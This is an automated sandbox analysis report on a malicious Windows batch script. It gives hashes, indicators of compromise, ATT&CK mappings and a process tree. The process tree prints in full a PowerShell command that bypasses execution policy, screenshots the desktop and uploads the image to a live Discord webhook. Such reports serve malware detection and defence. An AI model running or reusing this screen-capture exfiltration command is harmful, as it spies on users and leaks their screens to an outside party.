01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28

Analysis

max time kernel
60s
max time network
17s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
03/06/2024, 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dont run this.bat
Size

1013B
MD5

b4b00681eae6600fb830308d762457fd
SHA1

d2d11d34e7c91bf486833265adade5769f406618
SHA256

01c29ea7e2b4ddecf7ba8a1044c8238a7a1e9bc98f2a5ffa33f43390fcedbe28
SHA512

d4b4358580da3018436a9a34ec151f9912cc1675edb9474094570ca6aef4e427bf15de28f24f354a9b8cb0554c094f5c941e6461dc350fcad45ac9770b338209

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A

Signatures

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\UMDF\en-US\WUDFUsbccidDriver.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\amdk8.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\nwifi.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\usbhub.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\umbus.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ksecdd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\modem.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\lltdio.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\es-ES\WpdMtpDr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\videoprt.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ksthunk.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\bthenum.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\kbdclass.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\i8042prt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\nwifi.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\rdvgkmd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\kbdhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\MTConfig.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\wdf01000.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\parport.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\bthpan.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\cdrom.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ohci1394.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\umbus.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\BrSerId.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\volsnap.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\rdbss.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\atikmdag.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\vhdmp.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\nsiproxy.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\srv2.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\volmgrx.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\tsusbflt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\watchdog.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\mountmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\modem.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ndis.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\ndiscap.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\it-IT\WpdMtpDr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\netbios.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\asyncmac.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\mouclass.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\mountmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\intelppm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\pnpmem.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\ULIAGPKX.SYS.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\luafv.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\fvevol.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tcpipreg.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\processr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\rdbss.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\fltmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\luafv.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\sermouse.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\tpm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\agilevpn.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\volmgrx.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\processr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\umbus.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\kbdhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\tpm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fltMgr.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\pnpmem.sys.mui	cmd.exe

Manipulates Digital Signatures 1 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

description	ioc	Process
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PR116F~1.INF\Amd64\RIAGAP3.GPD	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\nltest.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\VaultSysUi.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-JP\compstui.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-JP\Licenses\_Default\StarterN\license.rtf	cmd.exe
File opened for modification	C:\Windows\System32\dmrc.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNEP3~1.INF\prnep304.PNF	cmd.exe
File opened for modification	C:\Windows\System32\wbem\de-DE\rdpcore.mfl	cmd.exe
File opened for modification	C:\Windows\System32\wbem\p2p-crp.mof	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\en-US\about_split.help.txt	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNKY0~3.INF\Amd64\KYKM2550.GPD	cmd.exe
File opened for modification	C:\Windows\System32\migwiz\DLMANI~1\PeerToPeerIdManager-DL.man	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\ja-JP\SCRAWPDO.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\en-US\winmm.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\snmptrap.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\es-ES\polproc.mfl	cmd.exe
File opened for modification	C:\Windows\System32\wpcsvc.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\en-US\brmfcmdm.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\MDMSON~1.INF\mdmsonyu.inf	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\microsoft-windows-hal-events.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\puiapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\BthpanContextHandler.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\mmcss.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\WFSR.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRD56E~1.INF\Amd64\EP0NGX9A.GPD	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\racpldlg.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PH550B~1.INF\Ph3xIB64.sys	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\pdhui.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-JP\ctfmon.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\migwiz\DLMANI~1\Printing-Spooler-Networkclient-DL.man	cmd.exe
File opened for modification	C:\Windows\System32\wbem\es-ES\p2p-collab.mfl	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\fr-FR\about_Arithmetic_Operators.help.txt	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\wlangpui.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\NETL1C~1.INF\netl1c64.PNF	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\WI277A~1.INF\CNFRA5.ICC	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\credwiz.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\els.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\shimgvw.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRCFC8~1.INF\prnlx00w.cat	cmd.exe
File opened for modification	C:\Windows\System32\en-US\wevtapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\oobe\de-DE\setup.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\taskhost.exe	cmd.exe
File opened for modification	C:\Windows\System32\adsnt.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNIN0~1.INF\Amd64\IF3350B.GPD	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\es-ES\netrast.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\wavemsp.dll	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\printui.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PR5B5F~1.INF\Amd64\CNBSQ4.DLL	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNHP0~2.INF\Amd64\hphp915t.exp	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PR0780~1.INF\prnlx00z.PNF	cmd.exe
File opened for modification	C:\Windows\System32\en-US\wwancfg.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\it-IT\bootstr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\autochk.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\L2SecHC.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\ja-JP\cdosys.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\en-US\prnca00e.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\MEMORY~1.INF\pnpmem.sys	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNBR0~4.INF\Amd64\BRDP383C.GPD	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNNR0~3.INF\Amd64\NRMPC303.PPD	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\WPDCOM~2.INF\Wpdcomp.dll	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\seclogon.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\Boot\en-US\winload.efi.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\de-DE\V_MSCDSC.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\ja-JP\about_Continue.help.txt	cmd.exe

Modifies termsrv.dll 1 TTPs 1 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3052	powershell.exe
2700	powershell.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
1988	timeout.exe
2316	timeout.exe
2556	timeout.exe
2628	timeout.exe
2536	timeout.exe
1188	timeout.exe
2840	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3052	powershell.exe
2700	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3052	powershell.exe
Token: SeDebugPrivilege	2700	powershell.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 2840	1888	cmd.exe	29
PID 1888 wrote to memory of 2840	1888	cmd.exe	29
PID 1888 wrote to memory of 2840	1888	cmd.exe	29
PID 1888 wrote to memory of 2968	1888	cmd.exe	30
PID 1888 wrote to memory of 2968	1888	cmd.exe	30
PID 1888 wrote to memory of 2968	1888	cmd.exe	30
PID 1888 wrote to memory of 1988	1888	cmd.exe	31
PID 1888 wrote to memory of 1988	1888	cmd.exe	31
PID 1888 wrote to memory of 1988	1888	cmd.exe	31
PID 1888 wrote to memory of 2600	1888	cmd.exe	33
PID 1888 wrote to memory of 2600	1888	cmd.exe	33
PID 1888 wrote to memory of 2600	1888	cmd.exe	33
PID 1888 wrote to memory of 2316	1888	cmd.exe	34
PID 1888 wrote to memory of 2316	1888	cmd.exe	34
PID 1888 wrote to memory of 2316	1888	cmd.exe	34
PID 1888 wrote to memory of 2520	1888	cmd.exe	36
PID 1888 wrote to memory of 2520	1888	cmd.exe	36
PID 1888 wrote to memory of 2520	1888	cmd.exe	36
PID 1888 wrote to memory of 2556	1888	cmd.exe	38
PID 1888 wrote to memory of 2556	1888	cmd.exe	38
PID 1888 wrote to memory of 2556	1888	cmd.exe	38
PID 1888 wrote to memory of 2624	1888	cmd.exe	39
PID 1888 wrote to memory of 2624	1888	cmd.exe	39
PID 1888 wrote to memory of 2624	1888	cmd.exe	39
PID 1888 wrote to memory of 2628	1888	cmd.exe	40
PID 1888 wrote to memory of 2628	1888	cmd.exe	40
PID 1888 wrote to memory of 2628	1888	cmd.exe	40
PID 1888 wrote to memory of 2564	1888	cmd.exe	42
PID 1888 wrote to memory of 2564	1888	cmd.exe	42
PID 1888 wrote to memory of 2564	1888	cmd.exe	42
PID 1888 wrote to memory of 2536	1888	cmd.exe	44
PID 1888 wrote to memory of 2536	1888	cmd.exe	44
PID 1888 wrote to memory of 2536	1888	cmd.exe	44
PID 1888 wrote to memory of 3052	1888	cmd.exe	45
PID 1888 wrote to memory of 3052	1888	cmd.exe	45
PID 1888 wrote to memory of 3052	1888	cmd.exe	45
PID 1888 wrote to memory of 1188	1888	cmd.exe	47
PID 1888 wrote to memory of 1188	1888	cmd.exe	47
PID 1888 wrote to memory of 1188	1888	cmd.exe	47
PID 1888 wrote to memory of 2700	1888	cmd.exe	49
PID 1888 wrote to memory of 2700	1888	cmd.exe	49
PID 1888 wrote to memory of 2700	1888	cmd.exe	49

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"
1⤵
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Drops file in System32 directory
- Modifies termsrv.dll
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 3
  2⤵
  - Delays execution with timeout.exe
  PID:2840
- C:\Windows\system32\cmd.exe
  cmd /k "call :spam"
  2⤵
  PID:2968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1988
- C:\Windows\system32\cmd.exe
  cmd /k "call :spam"
  2⤵
  PID:2600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2316
- C:\Windows\system32\cmd.exe
  cmd /k "call :spam"
  2⤵
  PID:2520
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2556
- C:\Windows\system32\cmd.exe
  cmd /k "call :spam"
  2⤵
  PID:2624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2628
- C:\Windows\system32\cmd.exe
  cmd /k "call :spam"
  2⤵
  PID:2564
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2536
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3052
- C:\Windows\system32\timeout.exe
  timeout /t 3
  2⤵
  - Delays execution with timeout.exe
  PID:1188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $screen = [System.Windows.Forms.SystemInformation]::VirtualScreen; $bmp = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height; $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bmp.Size); $file = 'C:\Users\Admin\Desktop\screenshot_' + (Get-Date -Format 'yyyyMMddHHmmss') + '.png'; $bmp.Save($file); $webhook = 'https://discord.com/api/webhooks/1247000288225788047/oaRJxaQkZ4jd8bhyZ6D4CaCKZyABlCK57qxox_DUnvGNxpCHeu453BFy2inhhHWNBd7A'; Invoke-RestMethod -Uri $webhook -Method Post -InFile $file"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\05PGI397H7NRNXQIRG02.temp

Filesize
7KB

MD5
d465fd2563ed5b9dfe253513e7b4899a

SHA1
ec6170be9189e497870cdffcc2a8e30412b4f396

SHA256
348d830681605d3f550b549cf710a5d3450bfc4708dcfd5a950b8b9fba86b328

SHA512
6eb733c2ac7a84c1fc01e802f086700f4673ac129821df2894a4eeacb853400aab170983ab3097dae822a1a9bb3cc066af4e07ab14f393d636b431650f5cf437

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6ae567368f5b9f323d5460e85e9e76a5

SHA1
b73764d0136c63faa49f2049b368d7d6c76282a6

SHA256
2c5a99a85e4870fb867ac27e150a642b6e28f7db35250a9e3c0c55650738a45c

SHA512
9ba3f8de6be3ef208b5b3bc1a4b18db2b43c9b32ffedc2849d1cb3a5f8bff98c1a524a060d8883f9c24fdcef060e1aa8950a157a835f45a99fef3a55edc10523

Download Submit
memory/2700-13-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2700-14-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/3052-4-0x000000001B5A0000-0x000000001B882000-memory.dmp

Filesize
2.9MB

Download
memory/3052-5-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download